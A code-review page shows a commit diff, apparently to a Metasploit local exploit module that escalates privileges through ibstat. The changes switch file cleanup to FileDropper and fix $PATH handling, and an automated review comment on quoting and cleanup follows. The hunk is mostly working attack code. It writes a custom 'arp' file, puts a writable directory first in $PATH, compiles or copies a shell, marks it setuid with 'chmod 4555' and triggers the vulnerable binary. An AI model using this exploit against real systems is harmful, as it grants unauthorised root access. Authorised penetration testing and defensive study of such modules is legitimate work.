Fix $PATH issues. Add FileDropper functionality
parent
e6c1dd3f9e
commit
a005d69b16
|
@ -7,6 +7,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
|
@ -90,23 +91,23 @@ chmod 4555 #{root_file}
|
|||
print_status("Compiling source...")
|
||||
cmd_exec "gcc -o #{root_file} #{root_file}.c"
|
||||
print_status("Compilation completed")
|
||||
print_status("Deleting source...")
|
||||
file_rm("#{root_file}.c")
|
||||
register_file_for_cleanup("#{root_file}.c")
|
||||
else
|
||||
cmd_exec "cp /bin/sh #{root_file}"
|
||||
end
|
||||
print_status("Writing custom arp file...")
|
||||
write_file("#{arp_file}",arp)
|
||||
register_file_for_cleanup("#{arp_file}")
|
||||
cmd_exec "chmod 0555 #{arp_file}"
|
||||
print_status("Custom arp file written")
|
||||
print_status("Updating $PATH environment variable...")
|
||||
path_env = cmd_exec 'echo $PATH'
|
||||
cmd_exec 'PATH=.:$PATH'
|
||||
cmd_exec "PATH=#{datastore["WritableDir"]}:$PATH"
|
||||
cmd_exec 'export PATH'
|
||||
print_status("Triggering vulnerablity...")
|
||||
cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
|
||||
print_status("Removing custom arp...")
|
||||
file_rm("#{arp_file}")
|
||||
# The $PATH variable must be restored before the payload is executed
|
||||
# in cases where an euid root shell was gained
|
||||
print_status('Restoring $PATH environment variable...')
|
||||
cmd_exec "PATH=#{path_env}"
|
||||
cmd_exec 'export PATH'
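Review bot: The restore step `cmd_exec "PATH=#{path_env}"` interpolates the saved value unquoted, as does `cmd_exec "PATH=#{datastore["WritableDir"]}:$PATH"`, so a value containing a space or a shell metacharacter is split or interpreted by the target shell, and the session can be left with the writable directory still at the front of `$PATH`. Escaping the value would make the restore dependable, e.g. `cmd_exec "PATH=#{Shellwords.escape(path_env)}"` (needs `require 'shellwords'`). The rendered page has lost its +/- markers, so it is not certain which of the `file_rm` and `register_file_for_cleanup` lines survive. If only the FileDropper registrations remain, confirm that `#{root_file}.c` and `#{arp_file}` are still removed from the tested host when no session is created, because the explicit `file_rm` calls ran unconditionally. The enclosing method starts and ends outside the hunk.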
|
||||
|
|